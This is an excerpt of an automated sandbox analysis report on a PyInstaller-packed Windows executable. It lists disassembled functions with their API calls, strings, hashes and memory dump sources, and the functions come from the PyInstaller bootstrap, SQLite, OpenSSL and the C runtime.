                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EF0F811F4D24A8DFE65B7B158C367912D15F88BB0F480730DD2EC62CAEE2DE4809690
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction ID: 60f8c9ef815a28acad91f9932d2e75c1c543784b6deed392831a18129e2f2de9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60D12F31A0CE868AEB10BF74E8962A937A4FF84B58F404235DE5D93AACDF3DD5558700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                • API String ID: 1405196051-1067337024
                                                                                                                                                                                                                                • Opcode ID: 3f8308d3fd2b10f9cc1c487fd35f85b6cf851aebd3b3235ad9291f3a453954cb
                                                                                                                                                                                                                                • Instruction ID: 8c848a1a3705cbce1b08813f078e2e411e3dff31d293b831dd632294bc781480
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f8308d3fd2b10f9cc1c487fd35f85b6cf851aebd3b3235ad9291f3a453954cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3023B61B0C28645FB7D8B149830B796691AF6ABBDF0443B1EA7E4B6D8DE3DE441C301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                • API String ID: 1405196051-509082904
                                                                                                                                                                                                                                • Opcode ID: 58a3b1aaf38c9906b7e86a496d91b7c7a38e210a7ae96e3a1f486201c27cbd31
                                                                                                                                                                                                                                • Instruction ID: 45871abe02abb7264065cc804e339d868c52764417746fd4f6249d6a1f27ac62
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58a3b1aaf38c9906b7e86a496d91b7c7a38e210a7ae96e3a1f486201c27cbd31
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4129021B09A4385FB689F15E460B7977A0BF41B98F584275EE6E0B6ECDF3DE5418300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D1730E148ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3906022758-0
                                                                                                                                                                                                                                • Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                • Instruction ID: e334443e7bcfa81efb8b66091aca6ff6db50cf40089973f531fa6bd3b5c66560
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C316C76718B81CAEB618F60E8607EE3360FB85748F44403ADA5E4BBA9DF38D548C715
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF64487842B
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784AE
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784CD
                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784DB
                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784EC
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784F5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction ID: bdff96ecf19b1bb6f1aff61b75035635b47a24be6078d4aa366f52dcaa5329e0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64411021B0CD46D9EA20BB64E8E61BA63A0FB94754F900232EE9DC36DCEF7DD5458740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                • API String ID: 0-2031831958
                                                                                                                                                                                                                                • Opcode ID: 3073ff3188e9ee9edf11f2fc228c5f0a47d3828b9a10be925a8c8f8668dd9abb
                                                                                                                                                                                                                                • Instruction ID: 7a83428554687c82b9cfd231e5ca5049f1fadffbd30106846ad06076edbcdefa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3073ff3188e9ee9edf11f2fc228c5f0a47d3828b9a10be925a8c8f8668dd9abb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCD13562B1D68285DB29AB18D0A4F7D7BA1FB44784F4A44B5DEAF437C9DE2EE400C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction ID: 625ac85325962cda5a6fd4c75934b7fa954b022cbb821c6a6661f7e51c7a068f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7311D7260CB81CAEB64AF60E8913EE63A4FB84744F44403ADA4E87B98DF79D548C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895C45
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A909
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A92E
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895C34
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EAA
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EBB
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895ECC
                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                                                                • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                • Instruction ID: 145fb6830e9407938e35f84bf17f59a8f148022e2e1c5078413f6604dd990ddb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10D1A123A1CA428EE764BF25D8D21B96B51EF84B94F448135EE0DC7A9EDF3EE4418740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction ID: dca020750825312e0512b41a023a55c1df99d0a722e480da8df9dcd5d666469b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF31513660CF8189EB64EB65E8812AE73A4FB84754F540135EE9D83B98DF3DD145CB00
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                • API String ID: 0-1194634662
                                                                                                                                                                                                                                • Opcode ID: ef7342f60bc5b2d48a9fd6b8c6db10ef1ff12d171feaad55dce560bd1c9dc77c
                                                                                                                                                                                                                                • Instruction ID: 05b2ac21bb49659d37cb58cb68a9ca046bbdf54da91c4ec577988bc3e090f16f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef7342f60bc5b2d48a9fd6b8c6db10ef1ff12d171feaad55dce560bd1c9dc77c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84D17E32B1878286F7109B25D460BA96760FB85B88F480236DE7CC7BDADF6DE541C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                • Instruction ID: 42465edde9679dc7cdadb9c7c662bb0e002e8e86ee19168b88f6c310d7881357
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FB1C522B1CA9289FA61BB6199821B96391EF44BE5F445131EE5D87BCDEF3DE441C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007
                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                • API String ID: 3568877910-3130753023
                                                                                                                                                                                                                                • Opcode ID: 1f5c165f081e2b630bbd1caa169cba93006ed19e963177b2c0bea09c2ce7ca5d
                                                                                                                                                                                                                                • Instruction ID: bd2e9fc37e96fae8037c9aeef087eb1ebe3d3f038aef2a3aadf1ae97502fb2b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f5c165f081e2b630bbd1caa169cba93006ed19e963177b2c0bea09c2ce7ca5d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C112AB63F0868282F7109B659864ABEA7A0EF85784F444236DE7D96BDEDF7CE441C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EAA
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EBB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895ECC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6448955C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955DC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3
                                                                                                                                                                                                                                Memory Dump Source
